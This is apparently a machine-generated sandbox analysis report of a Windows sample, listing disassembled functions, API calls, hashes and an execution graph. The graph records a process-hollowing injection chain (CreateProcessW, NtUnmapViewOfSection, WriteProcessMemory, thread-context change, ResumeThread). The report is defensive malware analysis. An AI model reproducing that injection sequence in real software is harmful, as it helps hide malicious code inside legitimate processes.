                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID: 8S`$P`
                                                                  • API String ID: 3990497365-1792595465
                                                                  • Opcode ID: f9160e2e3aea943f337618f753a94f9a5b8617bef0c3aad1d4f9833616218498
                                                                  • Instruction ID: 65422663e8b175293843514dc2e6730b18d16fd9701fe0644df9e792c6c37fbb
                                                                  • Opcode Fuzzy Hash: f9160e2e3aea943f337618f753a94f9a5b8617bef0c3aad1d4f9833616218498
                                                                  • Instruction Fuzzy Hash: 9D412E70A8425C9FDB69DB58CC85BDFB7FAAB04300F0440E9A608E7291D774AF848F55
                                                                  APIs
                                                                    • Part of subcall function 00607048: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
                                                                    • Part of subcall function 00607048: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
                                                                    • Part of subcall function 00607048: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
                                                                    • Part of subcall function 00607048: LoadStringA.USER32 ref: 00607147
                                                                  • CharToOemA.USER32 ref: 00607217
                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 00607234
                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0060723A
                                                                  • GetStdHandle.KERNEL32(000000F4,006072A4,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0060724F
                                                                  • WriteFile.KERNEL32(00000000,000000F4,006072A4,00000002,?), ref: 00607255
                                                                  • LoadStringA.USER32 ref: 00607277
                                                                  • MessageBoxA.USER32 ref: 0060728D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 185507032-0
                                                                  • Opcode ID: 6972115aa8794e35d0410798ef050c4773f5b9befd8970058d6dddba8381a8a3
                                                                  • Instruction ID: eb9fee9d3dd4f480ad86a08fe3e3c715f1e52eb9def34b6db25ae0c784218af9
                                                                  • Opcode Fuzzy Hash: 6972115aa8794e35d0410798ef050c4773f5b9befd8970058d6dddba8381a8a3
                                                                  • Instruction Fuzzy Hash: 0B114CB15883466ED358F7A4CC46F9B77EEAB84300F404519B354D60E2DF74E9048B2A
                                                                  APIs
                                                                  • RtlEnterCriticalSection.KERNEL32(0060B5C4,00000000,00601B9C), ref: 00601AD7
                                                                  • LocalFree.KERNEL32(?,00000000,00601B9C), ref: 00601AE9
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00601B9C), ref: 00601B0D
                                                                  • LocalFree.KERNEL32(00000000,?,00000000,00008000,?,00000000,00601B9C), ref: 00601B5E
                                                                  • RtlLeaveCriticalSection.KERNEL32(0060B5C4,00601BA3,?,00000000,00601B9C), ref: 00601B8C
                                                                  • RtlDeleteCriticalSection.KERNEL32(0060B5C4,00601BA3,?,00000000,00601B9C), ref: 00601B96
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                  • String ID:
                                                                  • API String ID: 3782394904-0
                                                                  • Opcode ID: 8690fb42c9bd25ff62939df394a92059a33dc87e72416101bb119c48be79a6f8
                                                                  • Instruction ID: c74aeac536d04daf1d9aaa2b88ae39994b19cafb1f7c4f4c32481e89d1555f1e
                                                                  • Opcode Fuzzy Hash: 8690fb42c9bd25ff62939df394a92059a33dc87e72416101bb119c48be79a6f8
                                                                  • Instruction Fuzzy Hash: 51213B74AC4244AFD75EEFA8DC56B5BBBE6EB0A300F10A499F5009B3E1D7345940DB14
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00602F26
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00602F59
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00602F6F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                  • API String ID: 3677997916-4173385793
                                                                  • Opcode ID: 1157a01e19796f37f2b5cc992d638ddb1fe2541e9874435bd59190aab0a157df
                                                                  • Instruction ID: c03fda469428753ecf02ecefcce68b4b7182e76c56f88a0b924b5aea7086ba02
                                                                  • Opcode Fuzzy Hash: 1157a01e19796f37f2b5cc992d638ddb1fe2541e9874435bd59190aab0a157df
                                                                  • Instruction Fuzzy Hash: 3601B5755C030AB9DB15DBE0CC56BFB77BDDB09744F5000A5BA04D65C0E6705A14D798
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,00606DFB,?,?,00000000), ref: 00606D7C
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00606DFB,?,?,00000000), ref: 00606DAC
                                                                  • EnumCalendarInfoA.KERNEL32(Function_00006CB0,00000000,00000000,00000004), ref: 00606DB7
                                                                  • GetThreadLocale.KERNEL32(00000000,00000003,00000000,00606DFB,?,?,00000000), ref: 00606DD5
                                                                  • EnumCalendarInfoA.KERNEL32(Function_00006CEC,00000000,00000000,00000003), ref: 00606DE0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread$CalendarEnum
                                                                  • String ID:
                                                                  • API String ID: 4102113445-0
                                                                  • Opcode ID: 64468f9e38e86cbae6d5be39c18cfd5a5062b6d04b52a85de6321f918ccf37d8
                                                                  • Instruction ID: 351a49cc6eeb8d263ff2a59df9ed8983b84ceb925ca044530df0050181d320a2
                                                                  • Opcode Fuzzy Hash: 64468f9e38e86cbae6d5be39c18cfd5a5062b6d04b52a85de6321f918ccf37d8
                                                                  • Instruction Fuzzy Hash: 940126757C42486BE319FBB0CC13B5B765FEF85720F510564F600E66C2EA659E1082A9
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(?,00000000,00606FDE,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00606E43
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: eeee$ggg$yyyy
                                                                  • API String ID: 4232894706-1253427255
                                                                  • Opcode ID: b291cb8597261f6514058d5d14fcbabcc4e1ef7db54b89a8c03662ca38e12f5f
                                                                  • Instruction ID: 549bb3956218e062135398211ae85f01a1fb8ae2f528c7acbdc3c2fb8c59784f
                                                                  • Opcode Fuzzy Hash: b291cb8597261f6514058d5d14fcbabcc4e1ef7db54b89a8c03662ca38e12f5f
                                                                  • Instruction Fuzzy Hash: 254103357C82164BD71DAB78C8816BFF7ABDB84300B604569F442D33C6DA70EE16C669
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,00606C9F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00606BA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LocaleThread
                                                                  • String ID: DR`$|R`$Q`
                                                                  • API String ID: 635194068-1853681101
                                                                  • Opcode ID: 06f649347e903f645061d77f2fb1060dac145866f74880fa77775b5ebe0026ea
                                                                  • Instruction ID: 239d570031dca18a3b836607bbb55e997dcfd0203a85c96b2fac2a33e89f6fe5
                                                                  • Opcode Fuzzy Hash: 06f649347e903f645061d77f2fb1060dac145866f74880fa77775b5ebe0026ea
                                                                  • Instruction Fuzzy Hash: B131B471F801085BD708DA95C891BAF77AFDB88310F11447AFA09D73C1DA35ED1187A9
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,00608799,00000000,006087AC), ref: 0060828E
                                                                  • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,00608799,00000000,006087AC), ref: 0060829F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                  • API String ID: 1646373207-3712701948
                                                                  • Opcode ID: 3d83e3763f9cb26a47f97c377c5ba6a369e8466b53bdeef0079a243f54f614f4
                                                                  • Instruction ID: 5e6b4c9483f2f7c51195c5a922daefa23dd3e15a114a57c8b2c2df2eadd9ead3
                                                                  • Opcode Fuzzy Hash: 3d83e3763f9cb26a47f97c377c5ba6a369e8466b53bdeef0079a243f54f614f4
                                                                  • Instruction Fuzzy Hash: 41D09EB06C1F469EF718EBE15C85613359F9740349F40A429B143472D1EEA589445FE5
                                                                  APIs
                                                                  • GetStringTypeA.KERNEL32(?,00000002,?,00000080,?), ref: 00607E66
                                                                  • GetThreadLocale.KERNEL32 ref: 00607D96
                                                                    • Part of subcall function 00607CF4: GetCPInfo.KERNEL32(00000000,?), ref: 00607D0D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocaleStringThreadType
                                                                  • String ID:
                                                                  • API String ID: 1505017576-0
                                                                  • Opcode ID: c20fea7ece837fd4a4d4c232880b2c9fb4836bd1c3298877a86fcb63a872c9ac
                                                                  • Instruction ID: 031fbc90ea44a9d57a695ee475c96b9f8855e0aa644ccf8bf3c3245cd95ddff9
                                                                  • Opcode Fuzzy Hash: c20fea7ece837fd4a4d4c232880b2c9fb4836bd1c3298877a86fcb63a872c9ac
                                                                  • Instruction Fuzzy Hash: 84312621EC93858BD764DB64EC017A73FA7EB91305F04A0D9E9448B3D2EB346C49C766
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0060787F), ref: 00607729
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0060787F), ref: 0060774B
                                                                    • Part of subcall function 00604B70: LoadStringA.USER32 ref: 00604BA2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                                                  • String ID: |Q`
                                                                  • API String ID: 902310565-1287144811
                                                                  • Opcode ID: f04f175d259c25fdcbc041710ef7f9a517576aab3b3a3207c45b177d1155a1ec
                                                                  • Instruction ID: 29300fce4ad5f21c6a0c8294c9238be0950d320ce33057e9c1de983e8ff0d5f7
                                                                  • Opcode Fuzzy Hash: f04f175d259c25fdcbc041710ef7f9a517576aab3b3a3207c45b177d1155a1ec
                                                                  • Instruction Fuzzy Hash: CE51D270A44658DFDB65DB68CD85BCAB7FAAB48300F4041E9E508AB391E770AE84CF51

                                                                  Execution Graph

                                                                   Execution Coverage: 4.1%
                                                                   Dynamic/Decrypted Code Coverage: 100%
                                                                   Signature Coverage: 0.3%
                                                                   Total number of Nodes: 1682
                                                                   Total number of Limit Nodes: 12
                                                                  execution_graph 5779 401040 5782 401000 EndTask 5779->5782 5783 401015 5782->5783 6581 6094e0 6582 6094bc 6581->6582 6583 603a10 11 API calls 6582->6583 6584 6094cc 6583->6584 6585 6044b4 13 API calls 6584->6585 6586 6094da 6585->6586 6182 403c42 6183 403c51 6182->6183 6184 403c56 MultiByteToWideChar 6183->6184 6185 403cbc 6183->6185 6184->6185 6186 403c6f LCMapStringW 6184->6186 6186->6185 6187 403c8a 6186->6187 6188 403c90 6187->6188 6190 403cd0 6187->6190 6188->6185 6189 403c9e LCMapStringW 6188->6189 6189->6185 6190->6185 6191 403d08 LCMapStringW 6190->6191 6191->6185 6192 403d20 WideCharToMultiByte 6191->6192 6192->6185 6587 6072e2 6588 6072e4 6587->6588 6589 6064bc 42 API calls 6588->6589 6590 60731d 6589->6590 6591 603a40 11 API calls 6590->6591 6592 607328 6591->6592 6593 6039ec 11 API calls 6592->6593 6594 60733d 6593->6594 6595 4018c3 6602 401955 6595->6602 6597 4018ce 6598 4018dc 6597->6598 6599 4024d8 7 API calls 6597->6599 6600 402511 7 API calls 6598->6600 6599->6598 6601 4018e5 6600->6601 6603 401966 23 API calls 6602->6603 6604 401962 6603->6604 6604->6597 5784 4030c5 5785 4030d8 5784->5785 5786 403111 HeapAlloc 5785->5786 5790 40313c 5785->5790 5791 40268d 5785->5791 5806 4034e6 5785->5806 5814 4026ee LeaveCriticalSection 5785->5814 5786->5785 5786->5790 5792 4026e3 EnterCriticalSection 5791->5792 5793 4026a5 5791->5793 5792->5785 5815 402c80 5793->5815 5797 40268d 18 API calls 5799 4026c3 5797->5799 5798 4026bb 5798->5797 5800 4026d4 5799->5800 5801 4026ca InitializeCriticalSection 5799->5801 5824 402b39 5800->5824 5802 4026d9 5801->5802 5837 4026ee LeaveCriticalSection 5802->5837 5805 4026e1 5805->5792 5810 403518 5806->5810 5807 4035c0 5888 4038a0 5807->5888 5810->5807 5813 4035d4 5810->5813 5881 4037ef 5810->5881 5813->5785 5814->5785 5838 402c92 5815->5838 5818 4018ce 5819 4018d7 5818->5819 5820 4018dc 5818->5820 5853 4024d8 5819->5853 5859 402511 5820->5859 5825 402b42 
5824->5825 5826 402b7f 5824->5826 5827 40268d 19 API calls 5825->5827 5826->5802 5828 402b49 5827->5828 5829 402b55 5828->5829 5830 402b68 5828->5830 5873 4031bb 5829->5873 5880 4026ee LeaveCriticalSection 5830->5880 5833 402b6f HeapFree 5833->5826 5834 402b5c 5879 4026ee LeaveCriticalSection 5834->5879 5836 402b63 5836->5802 5837->5805 5839 4026ad 5838->5839 5841 402c99 5838->5841 5839->5798 5839->5818 5841->5839 5842 402cbe 5841->5842 5843 402ccc 5842->5843 5844 402ce2 5842->5844 5846 40268d 19 API calls 5843->5846 5845 402cf4 HeapAlloc 5844->5845 5847 402ce9 5844->5847 5845->5847 5848 402cd3 5846->5848 5847->5841 5849 4034e6 5 API calls 5848->5849 5850 402cd9 5849->5850 5852 4026ee LeaveCriticalSection 5850->5852 5852->5844 5854 4024e2 5853->5854 5855 40250f 5854->5855 5856 402511 7 API calls 5854->5856 5855->5820 5857 4024f9 5856->5857 5858 402511 7 API calls 5857->5858 5858->5855 5861 402524 5859->5861 5860 4018e5 5860->5798 5861->5860 5862 40263b 5861->5862 5863 402564 5861->5863 5865 40264e GetStdHandle WriteFile 5862->5865 5863->5860 5864 402570 GetModuleFileNameA 5863->5864 5866 402588 5864->5866 5865->5860 5868 40399b 5866->5868 5869 4039a8 LoadLibraryA 5868->5869 5872 4039ea 5868->5872 5870 4039b9 GetProcAddress 5869->5870 5869->5872 5871 4039d0 GetProcAddress GetProcAddress 5870->5871 5870->5872 5871->5872 5872->5860 5874 403202 5873->5874 5875 4033f4 VirtualFree 5874->5875 5878 4034ae 5874->5878 5876 403458 5875->5876 5877 403467 VirtualFree HeapFree 5876->5877 5876->5878 5877->5878 5878->5834 5879->5836 5880->5833 5882 403832 HeapAlloc 5881->5882 5883 403802 HeapReAlloc 5881->5883 5885 4035b7 5882->5885 5886 403858 VirtualAlloc 5882->5886 5884 403821 5883->5884 5883->5885 5884->5882 5885->5807 5885->5813 5886->5885 5887 403872 HeapFree 5886->5887 5887->5885 5889 4038b2 VirtualAlloc 5888->5889 5891 4035c6 5889->5891 5891->5813 5908 4017c6 GetVersion 5940 4022c9 HeapCreate 5908->5940 5910 401824 5911 401831 5910->5911 5912 401829 5910->5912 5947 4021fb 
5911->5947 6036 4018f3 5912->6036 5916 401836 5917 401842 5916->5917 5918 40183a 5916->5918 5957 40203f 5917->5957 5919 4018f3 8 API calls 5918->5919 5921 401841 5919->5921 5921->5917 5922 40184c GetCommandLineA 5971 401f0d 5922->5971 5926 401866 5994 401c07 5926->5994 5928 40186b 5929 401870 GetStartupInfoA 5928->5929 6007 401baf 5929->6007 5931 401882 5932 40188b 5931->5932 5933 401894 GetModuleHandleA 5932->5933 6011 401600 5933->6011 5941 4022e9 5940->5941 5942 4022fe 5940->5942 6059 403152 HeapAlloc 5941->6059 5942->5910 5945 402301 5945->5910 5946 4022f2 HeapDestroy 5946->5942 6061 402664 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 5947->6061 5949 402201 TlsAlloc 5950 402211 5949->5950 5951 40224b 5949->5951 6062 4030c5 5950->6062 5951->5916 5953 40221a 5953->5951 5954 402222 TlsSetValue 5953->5954 5954->5951 5955 402233 5954->5955 5956 402239 GetCurrentThreadId 5955->5956 5956->5916 5958 402c80 20 API calls 5957->5958 5959 402052 5958->5959 5960 402060 GetStartupInfoA 5959->5960 5961 4018ce 7 API calls 5959->5961 5967 40217f 5960->5967 5970 4020ae 5960->5970 5961->5960 5963 4021aa GetStdHandle 5965 4021b8 GetFileType 5963->5965 5963->5967 5964 4021ea SetHandleCount 5964->5922 5965->5967 5966 402c80 20 API calls 5966->5970 5967->5963 5967->5964 5968 402125 5968->5967 5969 402147 GetFileType 5968->5969 5969->5968 5970->5966 5970->5967 5970->5968 5972 401f28 GetEnvironmentStringsW 5971->5972 5973 401f5b 5971->5973 5974 401f30 5972->5974 5976 401f3c GetEnvironmentStrings 5972->5976 5973->5974 5975 401f4c 5973->5975 5978 401f74 WideCharToMultiByte 5974->5978 5979 401f68 GetEnvironmentStringsW 5974->5979 5977 40185c 5975->5977 5980 401ffa 5975->5980 5981 401fee GetEnvironmentStrings 5975->5981 5976->5975 5976->5977 6042 401cc0 5977->6042 5983 401fa8 5978->5983 5984 401fda FreeEnvironmentStringsW 5978->5984 5979->5977 5979->5978 5985 402c80 20 API calls 5980->5985 5981->5977 5981->5980 5986 402c80 20 API 
[Execution graph rendering residue (node ids, edge list, API names) condensed. API call sequences recoverable from this part of the graph:]

- Function 0x401170 (reached from 0x401796, the path that follows CreateProcessW at 0x401782): NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory (three separate calls at 0x40121b, 0x401299, 0x401320), Wow64SetThreadContext, ResumeThread, each interleaved with ShowCaret calls.
- Path 0x4015c0 / 0x401668: GetCurrentProcess, SHGetFolderPathW, lstrcatW, ShellExecuteW; GetPEB (0x4015a0); repeated ShowCaret calls; LoadLibraryA (0x4016ef); EnumResourceNamesA (0x401721); VirtualProtect (0x401433); CreateProcessW (0x401782).
- Functions at 0x6047b8 / 0x6048c3: GetModuleFileNameA, RegOpenKeyExA (three calls), RegQueryValueExA, RegCloseKey; lstrcpynA, GetThreadLocale, GetLocaleInfoA, lstrlenA, LoadLibraryExA (three calls).
- Function 0x6045e0: GetModuleHandleA, GetProcAddress, CharNextA, lstrcpynA, FindFirstFileA, FindClose, lstrlenA.
- C runtime and locale helpers in the 0x402000-0x403fff range: GetCPInfo, GetOEMCP, GetACP, GetStringTypeA/W, LCMapStringA/W, MultiByteToWideChar, WideCharToMultiByte, HeapAlloc, GetLastError/SetLastError, TlsGetValue/TlsSetValue, GetCurrentThreadId, UnhandledExceptionFilter, RtlUnwind, GetCurrentProcess/TerminateProcess, ExitProcess, FreeEnvironmentStringsA, GetModuleFileNameA, LeaveCriticalSection.
- Runtime helpers in the 0x601000-0x609fff range: LocalAlloc/LocalFree, VirtualAlloc/VirtualFree/VirtualQuery, InitializeCriticalSection/EnterCriticalSection/LeaveCriticalSection/DeleteCriticalSection, TlsGetValue/TlsSetValue, GetStdHandle/WriteFile, MessageBoxA, FreeLibrary, ExitProcess, SysFreeString/SysReAllocStringLen, LoadStringA, GetModuleFileNameA, GetModuleHandleA/GetProcAddress, GetVersionExA, GetSystemMetrics, GetStringTypeExA, GetCPInfo, GetThreadLocale/GetLocaleInfoA/EnumCalendarInfoA, GetDiskFreeSpaceA, CreateWindowExA, CharToOemA, CharNextA, RaiseException, RegCloseKey, lstrcmpA, LoadLibraryA, GetPEB.
calls 7804->7809 7805->7804 7806 608826 7807 608dd8 13 API calls 7806->7807 7810 608839 7807->7810 7808 608862 7811 609624 13 API calls 7808->7811 7809->7808 7812 608a40 GetPEB 7810->7812 7813 608874 7811->7813 7814 60883e 7812->7814 7816 609624 13 API calls 7813->7816 7822 6039ec 11 API calls 7814->7822 7815->7804 7815->7806 7815->7808 7847 608a50 GetPEB 7815->7847 7817 608886 7816->7817 7819 603a40 11 API calls 7817->7819 7821 608893 7819->7821 7820 60881d 7820->7806 7848 608a6c GetPEB 7820->7848 7823 605e3c 42 API calls 7821->7823 7822->7804 7830 60889b 7823->7830 7825 6088d2 7826 609624 13 API calls 7825->7826 7828 6088e4 7826->7828 7827 605d50 11 API calls 7827->7830 7829 605e3c 42 API calls 7828->7829 7845 6088ec 7829->7845 7830->7825 7830->7827 7831 609624 13 API calls 7830->7831 7833 603c68 11 API calls 7830->7833 7831->7830 7832 60899f 7835 6044b4 13 API calls 7832->7835 7833->7830 7834 608a88 11 API calls 7834->7845 7836 6089ba 7835->7836 7837 603a10 11 API calls 7836->7837 7839 6089c7 7837->7839 7838 608b94 11 API calls 7838->7845 7840 603a84 11 API calls 7840->7845 7841 605e3c 42 API calls 7841->7845 7842 608c1c 11 API calls 7842->7845 7843 608cb8 11 API calls 7843->7845 7844 608eb4 15 API calls 7844->7845 7845->7832 7845->7834 7845->7838 7845->7840 7845->7841 7845->7842 7845->7843 7845->7844 7846 609014 18 API calls 7845->7846 7846->7845 7847->7820 7848->7806 7024 6074be 7025 6074f3 7024->7025 7026 6074ce 7024->7026 7035 607460 7025->7035 7026->7025 7027 6074f5 7026->7027 7029 607505 7026->7029 7031 6072a8 7029->7031 7032 6072af 7031->7032 7033 603a40 11 API calls 7032->7033 7034 6072c7 7033->7034 7034->7027 7043 6029b4 7035->7043 7038 607484 7040 6072a8 11 API calls 7038->7040 7039 607499 7041 6073a0 42 API calls 7039->7041 7042 607497 7040->7042 7041->7042 7042->7027 7044 604ddc 4 API calls 7043->7044 7045 6029ba 7044->7045 7046 604ddc 4 API calls 7045->7046 7047 6029c5 7046->7047 7047->7038 7047->7039 7048 6032be 7053 6033a1 7048->7053 7054 6032d1 
7048->7054 7049 603344 7050 603339 7049->7050 7051 60335f UnhandledExceptionFilter 7049->7051 7052 604ddc 4 API calls 7050->7052 7051->7050 7051->7053 7052->7053 7054->7049 7054->7053 7055 603324 UnhandledExceptionFilter 7054->7055 7055->7050 7055->7053 7056 607884 7057 60785b 7056->7057 7058 6039ec 11 API calls 7057->7058 7059 607866 7058->7059 7060 603a10 11 API calls 7059->7060 7061 607876 7060->7061 7062 6039ec 11 API calls 7061->7062 7063 60787e 7062->7063 7849 603186 7850 603191 7849->7850 7851 60344c 4 API calls 7850->7851 7852 6031a4 7851->7852 7857 603588 7858 603599 7857->7858 7861 6035fa 7857->7861 7859 6035a2 UnhandledExceptionFilter 7858->7859 7860 6034e8 7858->7860 7859->7860 7859->7861 7860->7861 7862 602920 7 API calls 7860->7862 7863 603584 7862->7863 6510 60760a 6513 607364 6510->6513 6512 60761e 6514 60736b 6513->6514 6515 604b70 42 API calls 6514->6515 6516 607383 6515->6516 6516->6512 7445 603b0a 7446 603b0c WideCharToMultiByte 7445->7446 7064 607890 7065 6078b5 7064->7065 7066 6078cc 7065->7066 7067 6078e3 7065->7067 7068 6078c6 7065->7068 7069 6072a8 11 API calls 7066->7069 7078 6076bc 7067->7078 7068->7066 7070 6078ee 7068->7070 7074 6078df 7069->7074 7072 604b70 42 API calls 7070->7072 7073 60790d 7072->7073 7103 6072e4 7073->7103 7076 6039ec 11 API calls 7074->7076 7077 60794a 7076->7077 7079 60770c 7078->7079 7080 6076fd 7078->7080 7082 604b70 42 API calls 7079->7082 7081 604b70 42 API calls 7080->7081 7083 60770a 7081->7083 7084 607719 VirtualQuery 7082->7084 7083->7084 7085 6077f1 7084->7085 7086 60773b GetModuleFileNameA 7084->7086 7087 604b70 42 API calls 7085->7087 7086->7085 7088 607758 